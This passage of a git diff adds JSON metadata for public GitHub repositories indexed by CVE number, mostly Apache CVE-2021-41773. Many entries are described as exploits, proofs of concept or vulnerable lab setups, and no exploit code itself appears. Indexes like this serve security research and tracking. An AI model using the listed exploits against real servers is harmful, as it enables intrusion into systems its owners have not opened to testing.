+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 521335808,
+ "name": "CVE-2021-41773",
+ "full_name": "Plunder283\/CVE-2021-41773",
+ "owner": {
+ "login": "Plunder283",
+ "id": 87617893,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87617893?v=4",
+ "html_url": "https:\/\/github.com\/Plunder283"
+ },
+ "html_url": "https:\/\/github.com\/Plunder283\/CVE-2021-41773",
+ "description": "CVE-2021-41773 Gaurav Raj's exploit modified by Plunder",
+ "fork": false,
+ "created_at": "2022-08-04T16:19:42Z",
+ "updated_at": "2022-08-04T16:33:22Z",
+ "pushed_at": "2022-08-04T16:34:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536947281,
+ "name": "cve-2021-41773",
+ "full_name": "mightysai1997\/cve-2021-41773",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T09:08:58Z",
+ "updated_at": "2022-09-15T09:09:16Z",
+ "pushed_at": "2022-09-15T09:09:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536953912,
+ "name": "CVE-2021-41773h",
+ "full_name": "mightysai1997\/CVE-2021-41773h",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773h",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T09:27:04Z",
+ "updated_at": "2022-09-15T09:27:22Z",
+ "pushed_at": "2024-04-21T04:23:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536957144,
+ "name": "cve-2021-41773-v-",
+ "full_name": "mightysai1997\/cve-2021-41773-v-",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-41773-v-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T09:36:17Z",
+ "updated_at": "2022-09-15T09:36:35Z",
+ "pushed_at": "2022-09-15T09:36:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536957769,
+ "name": "CVE-2021-41773-i-",
+ "full_name": "mightysai1997\/CVE-2021-41773-i-",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-i-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T09:38:04Z",
+ "updated_at": "2022-09-15T09:38:16Z",
+ "pushed_at": "2024-04-06T16:46:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536968315,
+ "name": "CVE-2021-41773-L-",
+ "full_name": "mightysai1997\/CVE-2021-41773-L-",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-L-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T10:08:36Z",
+ "updated_at": "2022-09-15T10:08:51Z",
+ "pushed_at": "2022-09-15T10:08:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536985771,
+ "name": "CVE-2021-41773-PoC",
+ "full_name": "mightysai1997\/CVE-2021-41773-PoC",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T11:01:45Z",
+ "updated_at": "2022-09-15T11:02:07Z",
+ "pushed_at": "2024-04-06T16:46:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 537018809,
+ "name": "CVE-2021-41773.git1",
+ "full_name": "mightysai1997\/CVE-2021-41773.git1",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773.git1",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T12:35:06Z",
+ "updated_at": "2022-09-15T12:35:18Z",
+ "pushed_at": "2022-09-15T12:35:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 537019898,
+ "name": "CVE-2021-41773m",
+ "full_name": "mightysai1997\/CVE-2021-41773m",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773m",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T12:37:59Z",
+ "updated_at": "2022-09-16T01:01:18Z",
+ "pushed_at": "2022-09-15T12:38:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 537060189,
+ "name": "CVE-2021-41773S",
+ "full_name": "mightysai1997\/CVE-2021-41773S",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773S",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T14:17:45Z",
+ "updated_at": "2022-09-16T01:01:16Z",
+ "pushed_at": "2024-04-06T22:17:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 538798099,
+ "name": "LayarKacaSiber-CVE-2021-41773",
+ "full_name": "dileepdkumar\/LayarKacaSiber-CVE-2021-41773",
+ "owner": {
+ "login": "dileepdkumar",
+ "id": 89115244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89115244?v=4",
+ "html_url": "https:\/\/github.com\/dileepdkumar"
+ },
+ "html_url": "https:\/\/github.com\/dileepdkumar\/LayarKacaSiber-CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-20T03:45:24Z",
+ "updated_at": "2022-09-20T03:45:37Z",
+ "pushed_at": "2024-04-06T20:03:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 560281575,
+ "name": "CVE-2021-41773",
+ "full_name": "aqiao-jashell\/CVE-2021-41773",
+ "owner": {
+ "login": "aqiao-jashell",
+ "id": 94209165,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94209165?v=4",
+ "html_url": "https:\/\/github.com\/aqiao-jashell"
+ },
+ "html_url": "https:\/\/github.com\/aqiao-jashell\/CVE-2021-41773",
+ "description": "apache路径穿越漏洞poc&exp",
+ "fork": false,
+ "created_at": "2022-11-01T05:58:59Z",
+ "updated_at": "2024-06-14T09:26:51Z",
+ "pushed_at": "2023-05-25T01:03:36Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 560339513,
+ "name": "py-CVE-2021-41773",
+ "full_name": "aqiao-jashell\/py-CVE-2021-41773",
+ "owner": {
+ "login": "aqiao-jashell",
+ "id": 94209165,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94209165?v=4",
+ "html_url": "https:\/\/github.com\/aqiao-jashell"
+ },
+ "html_url": "https:\/\/github.com\/aqiao-jashell\/py-CVE-2021-41773",
+ "description": "python编写的apache路径穿越poc&exp",
+ "fork": false,
+ "created_at": "2022-11-01T09:17:03Z",
+ "updated_at": "2023-02-06T08:31:07Z",
+ "pushed_at": "2022-11-02T09:26:06Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 567720828,
+ "name": "CVE-2021-41773",
+ "full_name": "12345qwert123456\/CVE-2021-41773",
+ "owner": {
+ "login": "12345qwert123456",
+ "id": 63474188,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4",
+ "html_url": "https:\/\/github.com\/12345qwert123456"
+ },
+ "html_url": "https:\/\/github.com\/12345qwert123456\/CVE-2021-41773",
+ "description": "Vulnerable configuration Apache HTTP Server version 2.4.49",
+ "fork": false,
+ "created_at": "2022-11-18T12:23:04Z",
+ "updated_at": "2022-11-21T16:25:14Z",
+ "pushed_at": "2022-11-21T16:20:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "cve-2021-41773",
+ "docker",
+ "http-server",
+ "lfi",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 569296799,
+ "name": "Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution",
+ "full_name": "blackn0te\/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution",
+ "owner": {
+ "login": "blackn0te",
+ "id": 33929865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33929865?v=4",
+ "html_url": "https:\/\/github.com\/blackn0te"
+ },
+ "html_url": "https:\/\/github.com\/blackn0te\/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution",
+ "description": "Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2022-11-22T14:09:18Z",
+ "updated_at": "2023-07-11T05:26:05Z",
+ "pushed_at": "2022-11-22T14:42:10Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 574682128,
+ "name": "exploit-apache2-cve-2021-41773",
+ "full_name": "TheKernelPanic\/exploit-apache2-cve-2021-41773",
+ "owner": {
+ "login": "TheKernelPanic",
+ "id": 78765297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78765297?v=4",
+ "html_url": "https:\/\/github.com\/TheKernelPanic"
+ },
+ "html_url": "https:\/\/github.com\/TheKernelPanic\/exploit-apache2-cve-2021-41773",
+ "description": "Exploit for path transversal vulnerability in apache",
+ "fork": false,
+ "created_at": "2022-12-05T21:11:28Z",
+ "updated_at": "2022-12-05T21:13:31Z",
+ "pushed_at": "2022-12-05T21:13:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 603146964,
+ "name": "apache2.4.49VulnerableLabSetup",
+ "full_name": "retrymp3\/apache2.4.49VulnerableLabSetup",
+ "owner": {
+ "login": "retrymp3",
+ "id": 65720815,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65720815?v=4",
+ "html_url": "https:\/\/github.com\/retrymp3"
+ },
+ "html_url": "https:\/\/github.com\/retrymp3\/apache2.4.49VulnerableLabSetup",
+ "description": "CVE-2021-41773 vulnerable apache version 2.4.49 lab set-up.",
+ "fork": false,
+ "created_at": "2023-02-17T18:03:23Z",
+ "updated_at": "2023-02-17T18:05:53Z",
+ "pushed_at": "2023-02-18T05:51:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 630673981,
+ "name": "docker-cve-2021-41773",
+ "full_name": "MatanelGordon\/docker-cve-2021-41773",
+ "owner": {
+ "login": "MatanelGordon",
+ "id": 72258277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72258277?v=4",
+ "html_url": "https:\/\/github.com\/MatanelGordon"
+ },
+ "html_url": "https:\/\/github.com\/MatanelGordon\/docker-cve-2021-41773",
+ "description": "A little demonstration of cve-2021-41773 on httpd docker containers",
+ "fork": false,
+ "created_at": "2023-04-20T22:37:06Z",
+ "updated_at": "2023-04-27T10:44:37Z",
+ "pushed_at": "2023-04-21T18:36:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41773",
+ "docker"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 649140370,
+ "name": "Apache-CVEs",
+ "full_name": "0xGabe\/Apache-CVEs",
+ "owner": {
+ "login": "0xGabe",
+ "id": 68028935,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4",
+ "html_url": "https:\/\/github.com\/0xGabe"
+ },
+ "html_url": "https:\/\/github.com\/0xGabe\/Apache-CVEs",
+ "description": "Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2023-06-03T22:59:20Z",
+ "updated_at": "2023-06-04T02:56:40Z",
+ "pushed_at": "2023-06-03T23:12:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 673733144,
+ "name": "CVE-2021-41773_CVE-2021-42013_Exploits",
+ "full_name": "OfriOuzan\/CVE-2021-41773_CVE-2021-42013_Exploits",
+ "owner": {
+ "login": "OfriOuzan",
+ "id": 104366208,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104366208?v=4",
+ "html_url": "https:\/\/github.com\/OfriOuzan"
+ },
+ "html_url": "https:\/\/github.com\/OfriOuzan\/CVE-2021-41773_CVE-2021-42013_Exploits",
+ "description": "Exploit CVE-2021-41773 and CVE-2021-42013",
+ "fork": false,
+ "created_at": "2023-08-02T09:50:10Z",
+ "updated_at": "2023-11-10T19:10:30Z",
+ "pushed_at": "2023-08-02T09:51:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 677373693,
+ "name": "CVE-2021-41773-MSF",
+ "full_name": "belajarqywok\/CVE-2021-41773-MSF",
+ "owner": {
+ "login": "belajarqywok",
+ "id": 59132829,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59132829?v=4",
+ "html_url": "https:\/\/github.com\/belajarqywok"
+ },
+ "html_url": "https:\/\/github.com\/belajarqywok\/CVE-2021-41773-MSF",
+ "description": "Simple Metasploit-Framework module for conducting website penetration tests (CVE-2021-41773).",
+ "fork": false,
+ "created_at": "2023-08-11T12:12:09Z",
+ "updated_at": "2023-10-02T04:03:33Z",
+ "pushed_at": "2023-08-11T12:14:35Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "metasploit-framework",
+ "metasploit-modules",
+ "penetration-testing",
+ "research",
+ "security-automation",
+ "testing"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 721073490,
+ "name": "CVE-2021-41773",
+ "full_name": "Iris288\/CVE-2021-41773",
+ "owner": {
+ "login": "Iris288",
+ "id": 101178777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101178777?v=4",
+ "html_url": "https:\/\/github.com\/Iris288"
+ },
+ "html_url": "https:\/\/github.com\/Iris288\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-20T09:57:07Z",
+ "updated_at": "2023-11-20T13:51:44Z",
+ "pushed_at": "2023-11-20T10:42:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809527050,
+ "name": "CVE-2021-41773",
+ "full_name": "Maybe4a6f7365\/CVE-2021-41773",
+ "owner": {
+ "login": "Maybe4a6f7365",
+ "id": 87483432,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87483432?v=4",
+ "html_url": "https:\/\/github.com\/Maybe4a6f7365"
+ },
+ "html_url": "https:\/\/github.com\/Maybe4a6f7365\/CVE-2021-41773",
+ "description": "CVE-2021-41773.py",
+ "fork": false,
+ "created_at": "2024-06-02T23:43:35Z",
+ "updated_at": "2024-06-03T00:03:13Z",
+ "pushed_at": "2024-06-03T00:03:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": true,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41784.json b/2021/CVE-2021-41784.json
new file mode 100644
index 0000000000..a46f237a87
--- /dev/null
+++ b/2021/CVE-2021-41784.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 419148076,
+ "name": "CVE-2021-41784",
+ "full_name": "Jeromeyoung\/CVE-2021-41784",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-41784",
+ "description": "CVE-2021-41773 Docker lab",
+ "fork": false,
+ "created_at": "2021-10-20T01:40:53Z",
+ "updated_at": "2023-01-25T05:12:20Z",
+ "pushed_at": "2021-10-20T01:21:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41801.json b/2021/CVE-2021-41801.json
new file mode 100644
index 0000000000..65712d3d2d
--- /dev/null
+++ b/2021/CVE-2021-41801.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 542333481,
+ "name": "CVE-2021-41801",
+ "full_name": "5l1v3r1\/CVE-2021-41801",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-41801",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-27T23:55:41Z",
+ "updated_at": "2022-09-27T23:55:41Z",
+ "pushed_at": "2022-04-12T13:26:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41805.json b/2021/CVE-2021-41805.json
new file mode 100644
index 0000000000..0c05ba6550
--- /dev/null
+++ b/2021/CVE-2021-41805.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 575363965,
+ "name": "CVE-2021-41805",
+ "full_name": "blackm4c\/CVE-2021-41805",
+ "owner": {
+ "login": "blackm4c",
+ "id": 78611909,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78611909?v=4",
+ "html_url": "https:\/\/github.com\/blackm4c"
+ },
+ "html_url": "https:\/\/github.com\/blackm4c\/CVE-2021-41805",
+ "description": "HashiCorp Consul exploit with python. (CVE-2021-41805)",
+ "fork": false,
+ "created_at": "2022-12-07T10:50:17Z",
+ "updated_at": "2022-12-08T02:19:59Z",
+ "pushed_at": "2022-12-07T10:56:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41822.json b/2021/CVE-2021-41822.json
new file mode 100644
index 0000000000..cc48da87f2
--- /dev/null
+++ b/2021/CVE-2021-41822.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411250558,
+ "name": "CVE-2021-41822",
+ "full_name": "badboycxcc\/CVE-2021-41822",
+ "owner": {
+ "login": "badboycxcc",
+ "id": 72059221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4",
+ "html_url": "https:\/\/github.com\/badboycxcc"
+ },
+ "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-41822",
+ "description": "个人CVE",
+ "fork": false,
+ "created_at": "2021-09-28T11:17:41Z",
+ "updated_at": "2021-11-03T03:53:59Z",
+ "pushed_at": "2021-10-20T10:15:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4191.json b/2021/CVE-2021-4191.json
new file mode 100644
index 0000000000..dce0991926
--- /dev/null
+++ b/2021/CVE-2021-4191.json
@@ -0,0 +1,70 @@
+[
+ {
+ "id": 649522285,
+ "name": "CVE-2021-4191_Exploits",
+ "full_name": "Adelittle\/CVE-2021-4191_Exploits",
+ "owner": {
+ "login": "Adelittle",
+ "id": 58516494,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58516494?v=4",
+ "html_url": "https:\/\/github.com\/Adelittle"
+ },
+ "html_url": "https:\/\/github.com\/Adelittle\/CVE-2021-4191_Exploits",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-05T04:08:45Z",
+ "updated_at": "2023-09-28T11:46:21Z",
+ "pushed_at": "2023-06-05T04:11:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 669611759,
+ "name": "CVE-2021-4191-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2021-4191-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-4191-EXPLOIT",
+ "description": "A PoC exploit for CVE-2021-4191 - GitLab User Enumeration.",
+ "fork": false,
+ "created_at": "2023-07-22T21:06:51Z",
+ "updated_at": "2024-04-24T15:52:38Z",
+ "pushed_at": "2023-08-09T10:41:22Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "api",
+ "cve-2021-4191",
+ "exploit",
+ "exploitation",
+ "gitlab",
+ "graphql",
+ "user-enumeration"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41946.json b/2021/CVE-2021-41946.json
new file mode 100644
index 0000000000..8b4d24ee0a
--- /dev/null
+++ b/2021/CVE-2021-41946.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 493307734,
+ "name": "CVE-2021-41946",
